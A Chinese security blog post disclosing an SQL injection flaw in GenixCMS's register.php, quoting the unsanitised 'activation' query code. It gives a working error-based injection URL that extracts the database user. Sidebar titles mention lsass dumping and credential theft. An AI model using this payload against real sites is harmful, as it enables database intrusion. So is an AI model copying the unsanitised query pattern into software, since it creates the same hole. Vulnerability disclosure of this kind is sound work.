GenixCMS某处SQL注入漏洞

admin

102620
文章

87
评论

2024年4月4日09:37:07评论1 views字数 465阅读1分33秒阅读模式

GenixCMS介绍

GenixCMS一款简单和轻量级的移动商务内容管理系统，官网：http://genixcms.org/

漏洞原理

程序根目录下的register.php中，第116行到118行：

if (isset($_GET['activation'])) {
    # code...
    $usr = Db::result(sprintf("SELECT * FROM `user` WHERE `activation` = '%s' LIMIT 1", $_GET['activation'] ));

可以看到直接从网址获取activation并且没有经过任何过滤，直接带入了sql语句查询，故存在sql注入漏洞。

漏洞证明

注入payload如下：

http://genixcms.localhost/register.php?activation=1%27%20and%201=(updatexml(1,concat(0x23,(select%20user()),0x23),1))%23

GenixCMS某处SQL注入漏洞

TangScan插件

将在官方修复后发布。

- source:www.hackersb.cn

左青龙
微信扫一扫

右白虎
微信扫一扫

GenixCMS某处SQL注入漏洞

GenixCMS介绍

漏洞原理

漏洞证明

TangScan插件

php Thread实例

获取wdigest明文密码加密传输至远程服务器

dump lsass进程

CVE-2020-0688 powershell版

CVE-2020-0601 伪造签名笔记

从零开始学windows API

查看注册表键值修改时间

c++ 修改注册表键值

keylogger

使用 R820T2 电视棒收听 FM 广播

发表评论